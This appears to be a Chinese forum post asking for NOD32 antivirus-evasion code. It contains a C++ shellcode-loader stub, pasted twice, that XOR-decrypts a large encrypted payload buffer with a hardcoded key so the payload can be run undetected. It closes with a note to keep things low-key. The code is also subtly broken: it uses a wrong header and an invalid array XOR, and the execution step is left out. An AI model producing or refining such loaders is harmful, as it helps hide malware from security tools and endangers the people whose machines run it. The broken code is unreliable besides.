求免杀nod32 部分代码
#include <iostream>
#include <windows>
const int g_ShellCodeFileSize = 304640;
unsigned char g_ShellCodeFileBuff[g_ShellCodeFileSize] = {/* 实际的 byte 数据 */};
const char* MyFileTabLe = "NESYMw7z9gGnB";
int MyFileTabLe_len = strlen(MyFileTabLe);
void DecryptMemory() {
for (int i = 0, j = 0; i < g_ShellCodeFileSize; i++) {
g_ShellCodeFileBuff ^= MyFileTabLe[j++] % 1753 + 79;
if (j % MyFileTabLe_len == 0)
j = 0;
}
}
int main() {
// 在进行解密之前,g_ShellCodeFileBuff 存储的是密文数据
DecryptMemory();
// 此时,g_ShellCodeFileBuff 存储的是已解密的明文数据
// 运行使用解密后的数据的其他逻辑
// ...
return 0;
}
#include <iostream>
#include <windows>
const int g_ShellCodeFileSize = 304640;
unsigned char g_ShellCodeFileBuff[g_ShellCodeFileSize] = {/* 实际的 byte 数据 */};
const char* MyFileTabLe = "NESYMw7z9gGnB";
int MyFileTabLe_len = strlen(MyFileTabLe);
void DecryptMemory() {
for (int i = 0, j = 0; i < g_ShellCodeFileSize; i++) {
g_ShellCodeFileBuff ^= MyFileTabLe[j++] % 1753 + 79;
if (j % MyFileTabLe_len == 0)
j = 0;
}
}
int main() {
// 在进行解密之前,g_ShellCodeFileBuff 存储的是密文数据
DecryptMemory();
// 此时,g_ShellCodeFileBuff 存储的是已解密的明文数据
// 运行使用解密后的数据的其他逻辑
// ...
return 0;
}
低调.











